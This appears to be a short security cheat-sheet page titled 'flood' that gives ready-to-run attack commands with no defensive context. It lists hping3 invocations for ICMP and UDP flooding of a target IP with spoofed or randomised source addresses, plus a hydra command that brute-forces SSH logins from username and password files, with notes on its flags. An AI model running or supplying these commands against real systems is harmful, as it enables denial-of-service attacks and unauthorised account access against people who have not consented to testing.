> For the complete documentation index, see [llms.txt](https://sec.yunwei361.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sec.yunwei361.com/flood.md).

# flood

### hping3

```bash
sudo hping3 --icmp --rand-source --flood <target_ip>
```

```bash
sudo hping3 --udp -a 8.8.8.8 -p 8888 --flood <target_ip>
sudo hping3 --udp --rand-source -p 80 --flood <target_ip>
```

### hydra

```bash
hydra -L user.txt -P password.txt -o result.txt -s 22 127.0.0.1 ssh

# -o write to file
# -s define different default PORT
```
